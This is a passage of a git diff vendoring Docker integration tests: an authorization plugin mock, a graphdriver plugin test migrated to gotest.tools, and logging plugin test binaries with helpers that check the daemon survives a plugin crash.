+		if err != nil {
+			panic("could not unmarshal json for /AuthZPlugin.AuthZRes: " + err.Error())
+		}
+
+		assertBody(authReq.RequestURI, authReq.ResponseHeaders, authReq.ResponseBody)
+		assertAuthHeaders(authReq.ResponseHeaders)
+
+		// Count only server version api
+		if strings.HasSuffix(authReq.RequestURI, serverVersionAPI) {
+			ctrl.versionResCount++
+		}
+		resRes := ctrl.resRes
+		if isAllowed(authReq.RequestURI) {
+			resRes = authorization.Response{Allow: true}
+		}
+		if resRes.Err != "" {
+			w.WriteHeader(http.StatusInternalServerError)
+		}
+		b, err := json.Marshal(resRes)
+		if err != nil {
+			panic("could not marshal json for /AuthZPlugin.AuthZRes: " + err.Error())
+		}
+		ctrl.resUser = authReq.User
+		w.Write(b)
+	})
+}
+
+func teardownSuite() {
+	if server == nil {
+		return
+	}
+
+	server.Close()
+}
+
+// assertAuthHeaders validates authentication headers are removed
+func assertAuthHeaders(headers map[string]string) error {
+	for k := range headers {
+		if strings.Contains(strings.ToLower(k), "auth") || strings.Contains(strings.ToLower(k), "x-registry") {
+			panic(fmt.Sprintf("Found authentication headers in request '%v'", headers))
+		}
+	}
+	return nil
+}
+
+// assertBody asserts that body is removed for non text/json requests
+func assertBody(requestURI string, headers map[string]string, body []byte) {
+	if strings.Contains(strings.ToLower(requestURI), "auth") && len(body) > 0 {
+		panic("Body included for authentication endpoint " + string(body))
+	}
+
+	for k, v := range headers {
+		if strings.EqualFold(k, "Content-Type") && strings.HasPrefix(v, "text/") || v == "application/json" {
+			return
+		}
+	}
+	if len(body) > 0 {
+		panic(fmt.Sprintf("Body included while it should not (Headers: '%v')", headers))
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go b/vendor/github.com/docker/docker/integration/plugin/graphdriver/external_test.go
similarity index 50%
rename from vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go
rename to vendor/github.com/docker/docker/integration/plugin/graphdriver/external_test.go
index a794ca742d..3596056a84 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go
+++ b/vendor/github.com/docker/docker/integration/plugin/graphdriver/external_test.go
@@ -1,8 +1,7 @@
-// +build !windows
-
-package main
+package graphdriver
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
@@ -10,29 +9,24 @@ import (
 	"net/http"
 	"net/http/httptest"
 	"os"
-	"strings"
+	"runtime"
+	"testing"
 
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/client"
 	"github.com/docker/docker/daemon/graphdriver"
 	"github.com/docker/docker/daemon/graphdriver/vfs"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/integration/internal/requirement"
+	"github.com/docker/docker/internal/test/daemon"
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/plugins"
-	"github.com/go-check/check"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
 )
 
-func init() {
-	check.Suite(&DockerExternalGraphdriverSuite{
-		ds: &DockerSuite{},
-	})
-}
-
-type DockerExternalGraphdriverSuite struct {
-	server  *httptest.Server
-	jserver *httptest.Server
-	ds      *DockerSuite
-	d       *Daemon
-	ec      map[string]*graphEventsCounter
-}
-
 type graphEventsCounter struct {
 	activations int
 	creations   int
@@ -50,44 +44,69 @@ type graphEventsCounter struct {
 	diffsize    int
 }
 
-func (s *DockerExternalGraphdriverSuite) SetUpTest(c *check.C) {
-	s.d = NewDaemon(c)
-}
-
-func (s *DockerExternalGraphdriverSuite) OnTimeout(c *check.C) {
-	s.d.DumpStackAndQuit()
-}
-
-func (s *DockerExternalGraphdriverSuite) TearDownTest(c *check.C) {
-	s.d.Stop()
-	s.ds.TearDownTest(c)
-}
+func TestExternalGraphDriver(t *testing.T) {
+	skip.If(t, runtime.GOOS == "windows")
+	skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon")
+	skip.If(t, !requirement.HasHubConnectivity(t))
+
+	// Setup plugin(s)
+	ec := make(map[string]*graphEventsCounter)
+	sserver := setupPluginViaSpecFile(t, ec)
+	jserver := setupPluginViaJSONFile(t, ec)
+	// Create daemon
+	d := daemon.New(t, daemon.WithExperimental)
+	c := d.NewClientT(t)
+
+	for _, tc := range []struct {
+		name string
+		test func(client.APIClient, *daemon.Daemon) func(*testing.T)
+	}{
+		{
+			name: "json",
+			test: testExternalGraphDriver("json", ec),
+		},
+		{
+			name: "spec",
+			test: testExternalGraphDriver("spec", ec),
+		},
+		{
+			name: "pull",
+			test: testGraphDriverPull,
+		},
+	} {
+		t.Run(tc.name, tc.test(c, d))
+	}
 
-func (s *DockerExternalGraphdriverSuite) SetUpSuite(c *check.C) {
-	s.ec = make(map[string]*graphEventsCounter)
-	s.setUpPluginViaSpecFile(c)
-	s.setUpPluginViaJSONFile(c)
+	sserver.Close()
+	jserver.Close()
+	err := os.RemoveAll("/etc/docker/plugins")
+	assert.NilError(t, err)
 }
 
-func (s *DockerExternalGraphdriverSuite) setUpPluginViaSpecFile(c *check.C) {
+func setupPluginViaSpecFile(t *testing.T, ec map[string]*graphEventsCounter) *httptest.Server {
 	mux := http.NewServeMux()
-	s.server = httptest.NewServer(mux)
+	server := httptest.NewServer(mux)
+
+	setupPlugin(t, ec, "spec", mux, []byte(server.URL))
 
-	s.setUpPlugin(c, "test-external-graph-driver", "spec", mux, []byte(s.server.URL))
+	return server
 }
 
-func (s *DockerExternalGraphdriverSuite) setUpPluginViaJSONFile(c *check.C) {
+func setupPluginViaJSONFile(t *testing.T, ec map[string]*graphEventsCounter) *httptest.Server {
 	mux := http.NewServeMux()
-	s.jserver = httptest.NewServer(mux)
+	server := httptest.NewServer(mux)
 
-	p := plugins.NewLocalPlugin("json-external-graph-driver", s.jserver.URL)
+	p := plugins.NewLocalPlugin("json-external-graph-driver", server.URL)
 	b, err := json.Marshal(p)
-	c.Assert(err, check.IsNil)
+	assert.NilError(t, err)
 
-	s.setUpPlugin(c, "json-external-graph-driver", "json", mux, b)
+	setupPlugin(t, ec, "json", mux, b)
+
+	return server
 }
 
-func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ext string, mux *http.ServeMux, b []byte) {
+func setupPlugin(t *testing.T, ec map[string]*graphEventsCounter, ext string, mux *http.ServeMux, b []byte) {
+	name := fmt.Sprintf("%s-external-graph-driver", ext)
 	type graphDriverRequest struct {
 		ID         string `json:",omitempty"`
 		Parent     string `json:",omitempty"`
@@ -106,7 +125,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	}
 
 	respond := func(w http.ResponseWriter, data interface{}) {
-		w.Header().Set("Content-Type", "appplication/vnd.docker.plugins.v1+json")
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
 		switch t := data.(type) {
 		case error:
 			fmt.Fprintln(w, fmt.Sprintf(`{"Err": %q}`, t.Error()))
@@ -126,24 +145,24 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	}
 
 	base, err := ioutil.TempDir("", name)
-	c.Assert(err, check.IsNil)
+	assert.NilError(t, err)
 	vfsProto, err := vfs.Init(base, []string{}, nil, nil)
-	c.Assert(err, check.IsNil, check.Commentf("error initializing graph driver"))
+	assert.NilError(t, err, "error initializing graph driver")
 	driver := graphdriver.NewNaiveDiffDriver(vfsProto, nil, nil)
 
-	s.ec[ext] = &graphEventsCounter{}
+	ec[ext] = &graphEventsCounter{}
 	mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].activations++
+		ec[ext].activations++
 		respond(w, `{"Implements": ["GraphDriver"]}`)
 	})
 
 	mux.HandleFunc("/GraphDriver.Init", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].init++
+		ec[ext].init++
 		respond(w, "{}")
 	})
 
 	mux.HandleFunc("/GraphDriver.CreateReadWrite", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].creations++
+		ec[ext].creations++
 
 		var req graphDriverRequest
 		if err := decReq(r.Body, &req, w); err != nil {
@@ -157,7 +176,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	})
 
 	mux.HandleFunc("/GraphDriver.Create", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].creations++
+		ec[ext].creations++
 
 		var req graphDriverRequest
 		if err := decReq(r.Body, &req, w); err != nil {
@@ -171,7 +190,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	})
 
 	mux.HandleFunc("/GraphDriver.Remove", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].removals++
+		ec[ext].removals++
 
 		var req graphDriverRequest
 		if err := decReq(r.Body, &req, w); err != nil {
@@ -186,23 +205,24 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	})
 
 	mux.HandleFunc("/GraphDriver.Get", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].gets++
+		ec[ext].gets++
 
 		var req graphDriverRequest
 		if err := decReq(r.Body, &req, w); err != nil {
 			return
 		}
 
+		// TODO @gupta-ak: Figure out what to do here.
 		dir, err := driver.Get(req.ID, req.MountLabel)
 		if err != nil {
 			respond(w, err)
 			return
 		}
-		respond(w, &graphDriverResponse{Dir: dir})
+		respond(w, &graphDriverResponse{Dir: dir.Path()})
 	})
 
 	mux.HandleFunc("/GraphDriver.Put", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].puts++
+		ec[ext].puts++
 
 		var req graphDriverRequest
 		if err := decReq(r.Body, &req, w); err != nil {
@@ -217,7 +237,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	})
 
 	mux.HandleFunc("/GraphDriver.Exists", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].exists++
+		ec[ext].exists++
 
 		var req graphDriverRequest
 		if err := decReq(r.Body, &req, w); err != nil {
@@ -227,12 +247,12 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	})
 
 	mux.HandleFunc("/GraphDriver.Status", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].stats++
+		ec[ext].stats++
 		respond(w, &graphDriverResponse{Status: driver.Status()})
 	})
 
 	mux.HandleFunc("/GraphDriver.Cleanup", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].cleanups++
+		ec[ext].cleanups++
 		err := driver.Cleanup()
 		if err != nil {
 			respond(w, err)
@@ -242,7 +262,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	})
 
 	mux.HandleFunc("/GraphDriver.GetMetadata", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].metadata++
+		ec[ext].metadata++
 
 		var req graphDriverRequest
 		if err := decReq(r.Body, &req, w); err != nil {
@@ -258,7 +278,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	})
 
 	mux.HandleFunc("/GraphDriver.Diff", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].diff++
+		ec[ext].diff++
 
 		var req graphDriverRequest
 		if err := decReq(r.Body, &req, w); err != nil {
@@ -274,7 +294,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	})
 
 	mux.HandleFunc("/GraphDriver.Changes", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].changes++
+		ec[ext].changes++
 		var req graphDriverRequest
 		if err := decReq(r.Body, &req, w); err != nil {
 			return
@@ -289,7 +309,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	})
 
 	mux.HandleFunc("/GraphDriver.ApplyDiff", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].applydiff++
+		ec[ext].applydiff++
 		diff := r.Body
 		defer r.Body.Close()
 
@@ -309,7 +329,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	})
 
 	mux.HandleFunc("/GraphDriver.DiffSize", func(w http.ResponseWriter, r *http.Request) {
-		s.ec[ext].diffsize++
+		ec[ext].diffsize++
 
 		var req graphDriverRequest
 		if err := decReq(r.Body, &req, w); err != nil {
@@ -325,81 +345,118 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex
 	})
 
 	err = os.MkdirAll("/etc/docker/plugins", 0755)
-	c.Assert(err, check.IsNil, check.Commentf("error creating /etc/docker/plugins"))
+	assert.NilError(t, err)
 
 	specFile := "/etc/docker/plugins/" + name + "." + ext
 	err = ioutil.WriteFile(specFile, b, 0644)
-	c.Assert(err, check.IsNil, check.Commentf("error writing to %s", specFile))
+	assert.NilError(t, err)
 }
 
-func (s *DockerExternalGraphdriverSuite) TearDownSuite(c *check.C) {
-	s.server.Close()
-	s.jserver.Close()
-
-	err := os.RemoveAll("/etc/docker/plugins")
-	c.Assert(err, check.IsNil, check.Commentf("error removing /etc/docker/plugins"))
+func testExternalGraphDriver(ext string, ec map[string]*graphEventsCounter) func(client.APIClient, *daemon.Daemon) func(*testing.T) {
+	return func(c client.APIClient, d *daemon.Daemon) func(*testing.T) {
+		return func(t *testing.T) {
+			driverName := fmt.Sprintf("%s-external-graph-driver", ext)
+			d.StartWithBusybox(t, "-s", driverName)
+
+			ctx := context.Background()
+
+			testGraphDriver(t, c, ctx, driverName, func(t *testing.T) {
+				d.Restart(t, "-s", driverName)
+			})
+
+			_, err := c.Info(ctx)
+			assert.NilError(t, err)
+
+			d.Stop(t)
+
+			// Don't check ec.exists, because the daemon no longer calls the
+			// Exists function.
+			assert.Check(t, is.Equal(ec[ext].activations, 2))
+			assert.Check(t, is.Equal(ec[ext].init, 2))
+			assert.Check(t, ec[ext].creations >= 1)
+			assert.Check(t, ec[ext].removals >= 1)
+			assert.Check(t, ec[ext].gets >= 1)
+			assert.Check(t, ec[ext].puts >= 1)
+			assert.Check(t, is.Equal(ec[ext].stats, 5))
+			assert.Check(t, is.Equal(ec[ext].cleanups, 2))
+			assert.Check(t, ec[ext].applydiff >= 1)
+			assert.Check(t, is.Equal(ec[ext].changes, 1))
+			assert.Check(t, is.Equal(ec[ext].diffsize, 0))
+			assert.Check(t, is.Equal(ec[ext].diff, 0))
+			assert.Check(t, is.Equal(ec[ext].metadata, 1))
+		}
+	}
 }
 
-func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriver(c *check.C) {
-	testRequires(c, ExperimentalDaemon)
+func testGraphDriverPull(c client.APIClient, d *daemon.Daemon) func(*testing.T) {
+	return func(t *testing.T) {
+		d.Start(t)
+		defer d.Stop(t)
+		ctx := context.Background()
 
-	s.testExternalGraphDriver("test-external-graph-driver", "spec", c)
-	s.testExternalGraphDriver("json-external-graph-driver", "json", c)
-}
+		r, err := c.ImagePull(ctx, "busybox:latest", types.ImagePullOptions{})
+		assert.NilError(t, err)
+		_, err = io.Copy(ioutil.Discard, r)
+		assert.NilError(t, err)
 
-func (s *DockerExternalGraphdriverSuite) testExternalGraphDriver(name string, ext string, c *check.C) {
-	if err := s.d.StartWithBusybox("-s", name); err != nil {
-		b, _ := ioutil.ReadFile(s.d.LogFileName())
-		c.Assert(err, check.IsNil, check.Commentf("\n%s", string(b)))
+		container.Run(t, ctx, c, container.WithImage("busybox:latest"))
 	}
+}
 
-	out, err := s.d.Cmd("run", "--name=graphtest", "busybox", "sh", "-c", "echo hello > /hello")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-
-	err = s.d.Restart("-s", name)
-
-	out, err = s.d.Cmd("inspect", "--format={{.GraphDriver.Name}}", "graphtest")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(strings.TrimSpace(out), check.Equals, name)
-
-	out, err = s.d.Cmd("diff", "graphtest")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(strings.Contains(out, "A /hello"), check.Equals, true, check.Commentf("diff output: %s", out))
-
-	out, err = s.d.Cmd("rm", "-f", "graphtest")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-
-	out, err = s.d.Cmd("info")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-
-	err = s.d.Stop()
-	c.Assert(err, check.IsNil)
-
-	// Don't check s.ec.exists, because the daemon no longer calls the
-	// Exists function.
-	c.Assert(s.ec[ext].activations, check.Equals, 2)
-	c.Assert(s.ec[ext].init, check.Equals, 2)
-	c.Assert(s.ec[ext].creations >= 1, check.Equals, true)
-	c.Assert(s.ec[ext].removals >= 1, check.Equals, true)
-	c.Assert(s.ec[ext].gets >= 1, check.Equals, true)
-	c.Assert(s.ec[ext].puts >= 1, check.Equals, true)
-	c.Assert(s.ec[ext].stats, check.Equals, 5)
-	c.Assert(s.ec[ext].cleanups, check.Equals, 2)
-	c.Assert(s.ec[ext].applydiff >= 1, check.Equals, true)
-	c.Assert(s.ec[ext].changes, check.Equals, 1)
-	c.Assert(s.ec[ext].diffsize, check.Equals, 0)
-	c.Assert(s.ec[ext].diff, check.Equals, 0)
-	c.Assert(s.ec[ext].metadata, check.Equals, 1)
+func TestGraphdriverPluginV2(t *testing.T) {
+	skip.If(t, runtime.GOOS == "windows")
+	skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon")
+	skip.If(t, !requirement.HasHubConnectivity(t))
+	skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64")
+	skip.If(t, !requirement.Overlay2Supported(testEnv.DaemonInfo.KernelVersion))
+
+	d := daemon.New(t, daemon.WithExperimental)
+	d.Start(t)
+	defer d.Stop(t)
+
+	client := d.NewClientT(t)
+	defer client.Close()
+	ctx := context.Background()
+
+	// install the plugin
+	plugin := "cpuguy83/docker-overlay2-graphdriver-plugin"
+	responseReader, err := client.PluginInstall(ctx, plugin, types.PluginInstallOptions{
+		RemoteRef:            plugin,
+		AcceptAllPermissions: true,
+	})
+	defer responseReader.Close()
+	assert.NilError(t, err)
+	// ensure it's done by waiting for EOF on the response
+	_, err = io.Copy(ioutil.Discard, responseReader)
+	assert.NilError(t, err)
+
+	// restart the daemon with the plugin set as the storage driver
+	d.Stop(t)
+	d.StartWithBusybox(t, "-s", plugin, "--storage-opt", "overlay2.override_kernel_check=1")
+
+	testGraphDriver(t, client, ctx, plugin, nil)
 }
 
-func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriverPull(c *check.C) {
-	testRequires(c, Network, ExperimentalDaemon)
+func testGraphDriver(t *testing.T, c client.APIClient, ctx context.Context, driverName string, afterContainerRunFn func(*testing.T)) { //nolint: golint
+	id := container.Run(t, ctx, c, container.WithCmd("sh", "-c", "echo hello > /hello"))
 
-	c.Assert(s.d.Start(), check.IsNil)
+	if afterContainerRunFn != nil {
+		afterContainerRunFn(t)
+	}
+
+	i, err := c.ContainerInspect(ctx, id)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(i.GraphDriver.Name, driverName))
 
-	out, err := s.d.Cmd("pull", "busybox:latest")
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	diffs, err := c.ContainerDiff(ctx, id)
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(diffs, containertypes.ContainerChangeResponseItem{
+		Kind: archive.ChangeAdd,
+		Path: "/hello",
+	}), "diffs: %v", diffs)
 
-	out, err = s.d.Cmd("run", "-d", "busybox", "top")
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	err = c.ContainerRemove(ctx, id, types.ContainerRemoveOptions{
+		Force: true,
+	})
+	assert.NilError(t, err)
 }
diff --git a/vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go b/vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go
new file mode 100644
index 0000000000..6b6c1a1232
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go
@@ -0,0 +1,36 @@
+package graphdriver // import "github.com/docker/docker/integration/plugin/graphdriver"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+	"github.com/docker/docker/pkg/reexec"
+)
+
+var (
+	testEnv *environment.Execution
+)
+
+func init() {
+	reexec.Init() // This is required for external graphdriver tests
+}
+
+const dockerdBinary = "dockerd"
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	testEnv.Print()
+	os.Exit(m.Run())
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go
new file mode 100644
index 0000000000..6891d6a995
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go
@@ -0,0 +1,48 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net"
+	"net/http"
+	"os"
+)
+
+type start struct {
+	File string
+}
+
+func main() {
+	l, err := net.Listen("unix", "/run/docker/plugins/plugin.sock")
+	if err != nil {
+		panic(err)
+	}
+
+	mux := http.NewServeMux()
+	mux.HandleFunc("/LogDriver.StartLogging", func(w http.ResponseWriter, req *http.Request) {
+		startReq := &start{}
+		if err := json.NewDecoder(req.Body).Decode(startReq); err != nil {
+			http.Error(w, err.Error(), http.StatusBadRequest)
+			return
+		}
+
+		f, err := os.OpenFile(startReq.File, os.O_RDONLY, 0600)
+		if err != nil {
+			http.Error(w, err.Error(), http.StatusInternalServerError)
+			return
+		}
+
+		// Close the file immediately, this allows us to test what happens in the daemon when the plugin has closed the
+		// file or, for example, the plugin has crashed.
+		f.Close()
+
+		w.WriteHeader(http.StatusOK)
+		fmt.Fprintln(w, `{}`)
+	})
+	server := http.Server{
+		Addr:    l.Addr().String(),
+		Handler: mux,
+	}
+
+	server.Serve(l)
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go
new file mode 100644
index 0000000000..06ab7d0f9a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go
@@ -0,0 +1 @@
+package main
diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go
new file mode 100644
index 0000000000..1d619dd05e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go
@@ -0,0 +1 @@
+package cmd
diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go
new file mode 100644
index 0000000000..f91b4f3b02
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go
@@ -0,0 +1,19 @@
+package main
+
+import (
+	"net"
+	"net/http"
+)
+
+func main() {
+	l, err := net.Listen("unix", "/run/docker/plugins/plugin.sock")
+	if err != nil {
+		panic(err)
+	}
+
+	server := http.Server{
+		Addr:    l.Addr().String(),
+		Handler: http.NewServeMux(),
+	}
+	server.Serve(l)
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go
new file mode 100644
index 0000000000..06ab7d0f9a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go
@@ -0,0 +1 @@
+package main
diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go
new file mode 100644
index 0000000000..dbdd36b905
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go
@@ -0,0 +1,67 @@
+package logging
+
+import (
+	"context"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/internal/test/fixtures/plugin"
+	"github.com/docker/docker/pkg/locker"
+	"github.com/pkg/errors"
+)
+
+var pluginBuildLock = locker.New()
+
+func ensurePlugin(t *testing.T, name string) string {
+	pluginBuildLock.Lock(name)
+	defer pluginBuildLock.Unlock(name)
+
+	installPath := filepath.Join(os.Getenv("GOPATH"), "bin", name)
+	if _, err := os.Stat(installPath); err == nil {
+		return installPath
+	}
+
+	goBin, err := exec.LookPath("go")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	cmd := exec.Command(goBin, "build", "-o", installPath, "./"+filepath.Join("cmd", name))
+	cmd.Env = append(cmd.Env, "CGO_ENABLED=0")
+	if out, err := cmd.CombinedOutput(); err != nil {
+		t.Fatal(errors.Wrapf(err, "error building basic plugin bin: %s", string(out)))
+	}
+
+	return installPath
+}
+
+func withSockPath(name string) func(*plugin.Config) {
+	return func(cfg *plugin.Config) {
+		cfg.Interface.Socket = name
+	}
+}
+
+func createPlugin(t *testing.T, client plugin.CreateClient, alias, bin string, opts ...plugin.CreateOpt) {
+	pluginBin := ensurePlugin(t, bin)
+
+	opts = append(opts, withSockPath("plugin.sock"))
+	opts = append(opts, plugin.WithBinary(pluginBin))
+
+	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+	err := plugin.Create(ctx, client, alias, opts...)
+	cancel()
+
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func asLogDriver(cfg *plugin.Config) {
+	cfg.Interface.Types = []types.PluginInterfaceType{
+		{Capability: "logdriver", Prefix: "docker", Version: "1.0"},
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go
new file mode 100644
index 0000000000..3921fa6e69
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go
@@ -0,0 +1,79 @@
+package logging
+
+import (
+	"bufio"
+	"context"
+	"os"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/daemon"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
+)
+
+func TestContinueAfterPluginCrash(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon(), "test requires daemon on the same host")
+	t.Parallel()
+
+	d := daemon.New(t)
+	d.StartWithBusybox(t, "--iptables=false", "--init")
+	defer d.Stop(t)
+
+	client := d.NewClientT(t)
+	createPlugin(t, client, "test", "close_on_start", asLogDriver)
+
+	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+	assert.Assert(t, client.PluginEnable(ctx, "test", types.PluginEnableOptions{Timeout: 30}))
+	cancel()
+	defer client.PluginRemove(context.Background(), "test", types.PluginRemoveOptions{Force: true})
+
+	ctx, cancel = context.WithTimeout(context.Background(), 60*time.Second)
+
+	id := container.Run(t, ctx, client,
+		container.WithAutoRemove,
+		container.WithLogDriver("test"),
+		container.WithCmd(
+			"/bin/sh", "-c", "while true; do sleep 1; echo hello; done",
+		),
+	)
+	cancel()
+	defer client.ContainerRemove(context.Background(), id, types.ContainerRemoveOptions{Force: true})
+
+	// Attach to the container to make sure it's written a few times to stdout
+	attach, err := client.ContainerAttach(context.Background(), id, types.ContainerAttachOptions{Stream: true, Stdout: true})
+	assert.Assert(t, err)
+
+	chErr := make(chan error)
+	go func() {
+		defer close(chErr)
+		rdr := bufio.NewReader(attach.Reader)
+		for i := 0; i < 5; i++ {
+			_, _, err := rdr.ReadLine()
+			if err != nil {
+				chErr <- err
+				return
+			}
+		}
+	}()
+
+	select {
+	case err := <-chErr:
+		assert.Assert(t, err)
+	case <-time.After(60 * time.Second):
+		t.Fatal("timeout waiting for container i/o")
+	}
+
+	// check daemon logs for "broken pipe"
+	// TODO(@cpuguy83): This is horribly hacky but is the only way to really test this case right now.
+	// It would be nice if there was a way to know that a broken pipe has occurred without looking through the logs.
+	log, err := os.Open(d.LogFileName())
+	assert.Assert(t, err)
+	scanner := bufio.NewScanner(log)
+	for scanner.Scan() {
+		assert.Assert(t, !strings.Contains(scanner.Text(), "broken pipe"))
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/main_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/main_test.go
new file mode 100644
index 0000000000..e1292a5718
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/logging/main_test.go
@@ -0,0 +1,29 @@
+package logging // import "github.com/docker/docker/integration/plugin/logging"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var (
+	testEnv *environment.Execution
+)
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	testEnv.Print()
+	os.Exit(m.Run())
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go b/vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go
new file mode 100644
index 0000000000..0d9b15efbf
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go
@@ -0,0 +1,35 @@
+package logging
+
+import (
+	"context"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/internal/test/daemon"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
+)
+
+// Regression test for #35553
